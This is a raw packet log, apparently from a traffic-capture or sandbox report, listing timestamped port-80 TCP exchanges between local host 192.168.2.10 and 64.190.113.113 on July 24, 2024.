Jul 24, 2024 19:56:25.306153059 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.306154013 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.306154013 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.308451891 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308465004 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308475018 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308494091 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308506012 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308509111 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.308516979 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308536053 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308537960 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.308547020 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308553934 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.308557987 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308569908 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308585882 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308597088 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308597088 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.308608055 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308609962 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.308620930 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308809996 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.308809996 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.308954954 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308967113 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308976889 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308988094 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308998108 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.308999062 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.309009075 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.309015036 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.309149027 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.309791088 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.309803009 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.309813976 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.309827089 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.309837103 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.309849024 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.309860945 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.309883118 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.309883118 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.309883118 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.309963942 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.310795069 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.310806990 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.310817003 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.310828924 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.310839891 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.310851097 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.310863018 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.310868025 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.310895920 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.310895920 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.311554909 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.311568022 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.311578989 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.311590910 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.311602116 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.311613083 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.311623096 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.311625004 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.311625004 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.311634064 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.311639071 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.311676025 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.312491894 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.312503099 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.312513113 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.312524080 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.312535048 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.312546968 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.312557936 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.312557936 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.312557936 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.312577963 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.312678099 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.313364029 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.313375950 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.313381910 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.313388109 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.313393116 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.313400030 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.313405991 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.313416958 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.313479900 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.313479900 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.314254999 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.314266920 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.314276934 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.314289093 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.314299107 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.314310074 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.314320087 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.314330101 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.314330101 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.314331055 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.314399004 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.314399958 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.315167904 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.315179110 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.315191031 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.315203905 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.315213919 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.315226078 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.315231085 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.315236092 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.315248966 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.315274000 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.315274954 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.315363884 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.315974951 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.356353045 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.399225950 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.399352074 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.399363995 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.399466038 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.399610996 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.399624109 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.399635077 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.399646044 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.399856091 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.400190115 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.400202036 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.400213957 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.400224924 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.400235891 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.400248051 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.400290012 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.400460958 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.401143074 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.401154995 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.401165962 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.401177883 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.401189089 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.401201010 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.401211023 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.401256084 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.401408911 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.401839972 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.401851892 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.401863098 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.401875019 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.401885986 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.401897907 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.401907921 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.401931047 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.402034998 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.402734041 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.402745962 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.402756929 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.402769089 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.402781010 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.402791977 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.402844906 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.402983904 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.403593063 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.403604031 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.403614998 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.403625965 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.403635979 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.403647900 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.403657913 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.403681993 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.403800964 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.404514074 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.404525995 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.404536009 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.404546976 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.404557943 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.404576063 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.404587030 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.404660940 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.404700994 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.405458927 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.405472040 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.405483007 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.405493975 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.405505896 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.405517101 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.405560970 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.405802011 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.406372070 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.406384945 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.406394958 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.406405926 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.406416893 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.406428099 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.406438112 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.406477928 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.406601906 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.407371044 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.407382965 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.407393932 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.407408953 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.407422066 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.407433033 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.407444000 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.407496929 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.407591105 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.408363104 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.408375978 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.408386946 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.408399105 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.408410072 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.408422947 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.408447981 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.408524990 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.409188032 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.409200907 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.409212112 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.409223080 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.409233093 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.409245014 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.409255981 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.409279108 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.409440041 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.410211086 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.410223007 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.410233021 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.410244942 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.410255909 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.410267115 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.410276890 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.410300016 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.410393000 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.410790920 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.410804987 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.410815954 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.410826921 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.410837889 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.410850048 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.410917997 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.410978079 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.411556005 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.411567926 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.411577940 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.411590099 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.411601067 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.411612988 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.411623955 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.411647081 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.411979914 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.412128925 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.412141085 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.412152052 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.412163973 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.412174940 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.412188053 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.412198067 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.412234068 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.412374020 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.479640007 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.479677916 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.479691029 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.479926109 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.479938030 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.479948997 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.479962111 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.479978085 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.480012894 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.480036020 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.480446100 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.480458021 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.480469942 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.480489016 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.480504036 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.480515003 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.480528116 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.480578899 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.480863094 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.481411934 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.481425047 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.481435061 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.481447935 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.481458902 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.481470108 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.481482029 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.481494904 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.481565952 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.482283115 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.482316017 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.482330084 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.482342958 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.482355118 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.482366085 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.482378006 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.482388020 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.482400894 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.482542038 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.482542038 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.483269930 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.483283043 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.483295918 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.483306885 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.483319044 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.483331919 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.483338118 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.483350992 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.483361006 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.483643055 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.484098911 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.484111071 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.484232903 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.488444090 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.488857985 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.488872051 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.488884926 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.488895893 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.488990068 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.489006996 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.489025116 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.489203930 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.489537954 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.489551067 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.489562988 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.489574909 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.489586115 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.489598989 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.489610910 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.489622116 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.489746094 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.489763021 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.490219116 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.490231037 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.490245104 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.490257025 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.490267038 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.490278959 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.490291119 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.490303040 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.490314007 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.490314007 CEST	49733	80	192.168.2.10	64.190.113.113
